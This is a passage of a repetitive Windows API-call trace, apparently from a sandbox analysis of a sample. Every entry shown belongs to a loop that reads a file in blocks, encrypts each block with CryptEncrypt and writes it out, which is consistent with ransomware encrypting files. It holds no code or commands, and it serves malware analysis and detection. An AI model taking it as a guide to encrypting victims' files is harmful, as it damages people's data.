lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.288] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.288] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.289] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.289] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.289] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.289] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.289] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.289] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.290] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.290] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.290] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.290] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.290] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.290] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.291] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.291] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.291] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.291] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.291] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.292] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.292] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.292] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.292] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.292] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.292] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.293] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.293] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.293] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.293] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.293] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.294] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.294] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.295] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.295] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: 